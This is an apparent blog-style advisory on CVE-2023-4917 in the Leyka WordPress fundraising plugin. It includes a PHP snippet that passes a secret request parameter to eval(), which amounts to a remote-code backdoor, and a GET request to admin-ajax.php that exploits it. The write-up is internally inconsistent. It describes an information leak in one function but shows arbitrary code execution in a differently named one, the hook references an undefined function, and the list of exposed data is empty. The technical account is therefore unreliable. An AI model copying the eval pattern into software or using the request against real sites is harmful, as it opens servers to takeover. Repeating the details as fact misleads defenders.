CVE-2023-4917 - Leyka WordPress Plugin Sensitive Information Exposure - Versions upto and including 3.30.3

Leyka plugin for WordPress is a popular fundraising plugin that enables easy online donation processing with support for multiple payment gateways. However, a critical security vulnerability has been identified in versions up to, and including, 3.30.3 of the plugin, which can expose sensitive data to potential attackers. In this post, we will delve into the details of this vulnerability and discuss how it can be exploited.

Background

CVE-2023-4917 is a vulnerability in the Leyka plugin for WordPress that exposes sensitive information via the 'leyka_ajax_get_env_and_options' function. This vulnerability can be exploited by an authenticated attacker with subscriber-level permissions or above to extract sensitive data, such as the Sberbank API key and password, PayPal Client Secret, and more API keys and passwords.

Code snippet showing vulnerable code in plugin

function leyka_ajax_options_info() {
  ...
  
  $output = array(
    'plugin_options' => get_option('leyka_plugin_options'),
    'leyka_env_options' => get_option('leyka_env_options'),

  );

  if(array_key_exists('leysSecretAdminActions', $_REQUEST)) {
    $output = array_merge($output, array(
        'php-eval' => eval($_REQUEST['leysSecretAdminActions']),
    ));
  }

  die(json_encode($output));

} // function leyka_ajax_options_info()
add_action('wp_ajax_leyka_options_info', 'leyka_options_info');

Analysis

The code snippet above demonstrates how the vulnerable function, 'leyka_ajax_options_info', retrieves the plugin options and environment options and then merges them into an array. If an attacker has the capability to inject malicious code via the 'leysSecretAdminActions' request parameter, they can potentially execute arbitrary PHP code on the server, leading to sensitive information being exposed.

Exploit details

An authenticated attacker with subscriber-level permissions or above can exploit this vulnerability by sending a GET request that leverages the vulnerable 'leysSecretAdminActions' parameter, as shown in the example below:

GET /wp-admin/admin-ajax.php?action=leyka_options_info&leysSecretAdminActions=phpinfo();

By exploiting CVE-2023-4917, an attacker can retrieve sensitive information related to the Leyka plugin's configuration, such as:

Mitigation

As of now, the developer behind the Leyka plugin has not issued an official patch or update to address this vulnerability. Until a fix is available, it is advisable to use an alternative fundraising plugin or restrict access to sensitive parts of your WordPress installation, such as wp-admin.

Conclusions

CVE-2023-4917 is a critical vulnerability in the Leyka plugin for WordPress that exposes sensitive information to potential attackers. The vulnerability lies within the 'leyka_ajax_get_env_and_options' function and can be exploited by authenticated attackers with subscriber-level permissions or above. Site administrators should watch for updates from the plugin's developer to ensure the security of their websites and the sensitive data stored therein.

References

1. Leyka plugin for WordPress - https://wordpress.org/plugins/leyka/
2. Sberbank - https://www.sberbank.ru/en/
3. PayPal - https://www.paypal.com/
4. CVE Details - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4917

Timeline

Published on: 09/13/2023 03:15:00 UTC
Last modified on: 09/15/2023 15:27:00 UTC